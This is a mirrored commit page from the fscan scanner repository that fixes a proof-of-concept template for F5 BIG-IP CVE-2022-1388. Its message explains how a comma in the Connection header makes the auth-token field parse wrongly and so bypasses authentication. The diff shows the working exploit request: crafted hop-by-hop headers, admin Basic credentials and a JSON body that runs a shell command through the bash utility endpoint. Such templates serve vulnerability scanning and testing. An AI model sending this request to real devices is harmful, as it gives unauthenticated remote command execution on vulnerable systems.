mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

fix: 修复2022-188的poc

Browse Source 
header里面Connection属性keep-alive后面的逗号","
使得后面的x auth token字段解析出现错误, 从而绕过验证
This commit is contained in:
jindaxia 2022-05-19 17:34:57 +08:00
parent 2cef5c66d6
commit 85e636fcea
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
WebScan/pocs/f5-cve-2022-1388.yml
View File

@ -8,8 +8,8 @@ rules:
headers: headers:
Content-Type: application/json Content-Type: application/json
Connection: keep-alive, x-F5-Auth-Token Connection: keep-alive, x-F5-Auth-Token
Authorization: Basic YWRtaW46
X-F5-Auth-Token: a X-F5-Auth-Token: a
Authorization: Basic YWRtaW46
body: >- body: >-
{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"} {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
follow_redirects: false follow_redirects: false